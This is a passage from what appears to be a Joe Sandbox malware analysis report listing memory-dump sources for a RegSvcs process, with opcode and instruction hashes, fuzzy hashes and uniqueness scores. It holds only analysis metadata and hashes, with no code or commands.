                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                            • Instruction ID: cd74a99476abf44ed1c0683cdd80777bde4c396e03c8b05b98c310b364b0bed6
                                                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                            • Instruction Fuzzy Hash: 9A110233A016C59BEB22A7288C54F6437D4AB00B68F1E00B2E902C7752E32CDC42F211
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                            • Instruction ID: 8b75aeef49d7f2a8d6943627629204105d45dc9bd71244f1b94159615fcc0b07
                                                                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                            • Instruction Fuzzy Hash: 4801D233A40108AFD725AF58CC01F7AB6A9EF80B60F158125FA159B270E775DD40E790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
• Instruction ID: 58ad617fc492539b746d94d21eaba051884314f0411c6c641eed62e0cddc6456
• Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
• Instruction Fuzzy Hash: 44010032844B119BCB208F16D840A727BB8EB55B707008A2DF896AB281C735D800EFA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04f29cce58fdb21ddfb4bb4f6f5d0b0726d06ab45f9113f7f62a9d42cbbf3c20
• Instruction ID: 333d11fb3e3207318ac8536eae9754294886943f2a7d44d1666b853897524fc2
• Opcode Fuzzy Hash: 04f29cce58fdb21ddfb4bb4f6f5d0b0726d06ab45f9113f7f62a9d42cbbf3c20
• Instruction Fuzzy Hash: E401C4B75415009BC362DF1C9C81F56B7E8EB85770B1542A5E9E8DB1A6D730EC01D790
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b2a8200abfc63c145da5b23b5d9f9f52104125656533d8a37278b1969aac893
• Instruction ID: 82eeac7447c6c987ecaf1c71feb7dc4a6f0ecfe9904aef005cce10c6325894ba
• Opcode Fuzzy Hash: 2b2a8200abfc63c145da5b23b5d9f9f52104125656533d8a37278b1969aac893
• Instruction Fuzzy Hash: 6411AD32641240EFCB15EF19DD81F56BBB8FF48B94F2000A5FA059B662C639ED01DA90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e2e7ca2c816b5dc992c94994cc08902dfb59360b71f825ce6a523dc23effe2d
• Instruction ID: 0729d4c72c8b8783ef0b50960756580002efdc475b52d3082ce6a04b982bda04
• Opcode Fuzzy Hash: 0e2e7ca2c816b5dc992c94994cc08902dfb59360b71f825ce6a523dc23effe2d
• Instruction Fuzzy Hash: E0119A70941228ABDF65AB64CC42FE8B3B4AF48710F508195B328A60E1DB749E81EF84
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction ID: 27c95169a1cda01d74a591b266fbc5d5df5e452adb5d5c5b22ae9febbf770e54
• Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction Fuzzy Hash: 1B012433A001018BDF549A29D880F92B776BFD4720F6580BAED09CF246DA71DC81F3A1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3171fe4c4ca85c2843447f078a169ff7c42e945cd1a1255ce0bcd0b7373aae3f
• Instruction ID: 64e9c9939d2603a9e9e50f12000f8022812d599eb06c90286beb0f3c982a0240
• Opcode Fuzzy Hash: 3171fe4c4ca85c2843447f078a169ff7c42e945cd1a1255ce0bcd0b7373aae3f
• Instruction Fuzzy Hash: 9F11177390001DABCB11DB94CC85EEFBB7CEF48358F044166E906E7211EA34AA15DBA0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a31ee2764779366a7dcbf0fb0f92ffd97f1c7cdc37904bb3f7407fd32357c339
• Instruction ID: 42df2362b01bc066a625c21f2045ab388a5cdb3067242fe9dffc1cb851fdda87
• Opcode Fuzzy Hash: a31ee2764779366a7dcbf0fb0f92ffd97f1c7cdc37904bb3f7407fd32357c339
• Instruction Fuzzy Hash: F811A5326441459FD712CF58D800BA5B7F6FB5A314F088199E8848B355D733EC85CBA0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6a97f4405b8f6d684d2e95606eac4adc40c6aa20ea0c9565eccaf09376ebdb71
• Instruction ID: ba80d8a5c994411e0afe414c39a0bebcefe2969d1268ed476fe8b99303be3e12
• Opcode Fuzzy Hash: 6a97f4405b8f6d684d2e95606eac4adc40c6aa20ea0c9565eccaf09376ebdb71
• Instruction Fuzzy Hash: 1511ECB1E0021D9BCB04DF9AD541AAEB7F4EF48750F10406AF905E7351D674EE01DBA4
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a175f5039ca76341371d24f0bfeb3a2213f84f3a92b78434aa7bca5d6776962
• Instruction ID: a1c7a4b927eea67b623dde23e43a991d3e50481a8c9f218dc2aa14879a165dd2
• Opcode Fuzzy Hash: 8a175f5039ca76341371d24f0bfeb3a2213f84f3a92b78434aa7bca5d6776962
• Instruction Fuzzy Hash: 8511A971A0120CABCB00EFA9CC41FAE7BB5EF44740F104058F9019B291DA39AE01EF90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
• Instruction ID: 245cc2d123e9520ea64f8c8da2080057a0b59d4fe50ba2ad32df2bb14e777aec
• Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
• Instruction Fuzzy Hash: C201F972500705EFDB22A665CA00FB773E9FFC4310F54482DA585C7540DA74E802E750
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d7bfe9c1c4197ec3498983e32f6ec36898963d3cf94f7d4a46eaf3e7d3fe6d13
• Instruction ID: 09a97c57961e788db12fae81ff8caf966dedc0bbe3e3fc9daf9bdec814f12221
• Opcode Fuzzy Hash: d7bfe9c1c4197ec3498983e32f6ec36898963d3cf94f7d4a46eaf3e7d3fe6d13
• Instruction Fuzzy Hash: 8A018FB2641A40BFC651BB79CD81E97B7ECFB857A0B040629B10497A62DB68FC01D7B0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 42f0983a8dc611a3fe517c0de8753c58686656c77eedb55ea69fd103c9c7a05c
• Instruction ID: 148329448bcf51e53069636fb1b4332ec46eb3dd3c188cb9c9115aa0238b5f91
• Opcode Fuzzy Hash: 42f0983a8dc611a3fe517c0de8753c58686656c77eedb55ea69fd103c9c7a05c
• Instruction Fuzzy Hash: 60014C322142029BD320EF6EC8499ABBBE9EF49720F104129F9988B1C0E735A951CBD1
Uniqueness
• Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b8fedf6c3b25633095dd96b85696c3bba89c53c065c253c4666a7770d7420ba8
                                                                                            • Instruction ID: 6e04b9a2ad56d651b28ca0f6e0a86e1b77e12239acaf69ebbbd66e586b82f651
                                                                                            • Opcode Fuzzy Hash: b8fedf6c3b25633095dd96b85696c3bba89c53c065c253c4666a7770d7420ba8
                                                                                            • Instruction Fuzzy Hash: 37115771A0121CABCB15EFA4C951EAE7BB5EF48750F104059FD01973A1DA39EE11EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2bbd2cc6c9c07faf4b2b6068eda1cbf7017a80aaa3d5af4716001c84656969b1
                                                                                            • Instruction ID: 7f8a6d909064d308da0c5270cc7056514a7b85705d091ab5cac800c59e683151
                                                                                            • Opcode Fuzzy Hash: 2bbd2cc6c9c07faf4b2b6068eda1cbf7017a80aaa3d5af4716001c84656969b1
                                                                                            • Instruction Fuzzy Hash: 4E118EB16043089FC710DF69C94299BBBE4EF88710F00451EF998D7361D634E900CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 247d483f4b5e2309a3e367e0f80106396845564c9a06f73c81e7b149c35ca314
                                                                                            • Instruction ID: a90e8f3a14d1b3dbe9c1ec172de22419aa064093bf421488f5186a43e0a83f89
                                                                                            • Opcode Fuzzy Hash: 247d483f4b5e2309a3e367e0f80106396845564c9a06f73c81e7b149c35ca314
                                                                                            • Instruction Fuzzy Hash: 12118EB16043089FC300DF6AC94199BBBE4EF89750F00851EF958D7361E634E900DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                            • Instruction ID: 399505ed6da505bd6d670255d3353cf182d8a0737dd27efe4b10b2cb30d5c0da
                                                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                            • Instruction Fuzzy Hash: BB01BC326045849FD322A71CCA08F6677DCEF45B68F1D08A5F805CB6A2C7A8DC40E721
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 882687159cfbe7b18e9976dd61d5f16cf75ea826e41d7bb7c94a3c91291a7713
                                                                                            • Instruction ID: e54dce9199fe01dbf532154144a95c8e2df2a20494b8249a25733aa107bc4773
                                                                                            • Opcode Fuzzy Hash: 882687159cfbe7b18e9976dd61d5f16cf75ea826e41d7bb7c94a3c91291a7713
                                                                                            • Instruction Fuzzy Hash: 8F01F272B00508DBC714EB6ADC11ABE77B9FF80760F15812DE901AB252EE30ED02E690
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e30b6820944f008bddf0fbe3f52135706a378506ee99f437c6ee484c484b2dd6
                                                                                            • Instruction ID: 6823ed6cff2283dbb9d9ee7e39be85a7b3de900f346c5d54a9d18ba501b9a437
                                                                                            • Opcode Fuzzy Hash: e30b6820944f008bddf0fbe3f52135706a378506ee99f437c6ee484c484b2dd6
                                                                                            • Instruction Fuzzy Hash: 3801A7712407009FD3325B15DC41F4BBAE8FF45B50F110429F6859F395D6B9A8409B94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e871b665f0cd5dfb3c66d72812aa1e3070f08b65227ec1f8aa67c5edd499db4b
                                                                                            • Instruction ID: a11f35e3bcab383184cc33792b844799f514e76d60cb648ad4e2687f381c5015
                                                                                            • Opcode Fuzzy Hash: e871b665f0cd5dfb3c66d72812aa1e3070f08b65227ec1f8aa67c5edd499db4b
                                                                                            • Instruction Fuzzy Hash: A2F0A433A41A20B7C7319B56CD41F57BAAAEB84FA0F15802AB50997650DA34ED01EBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
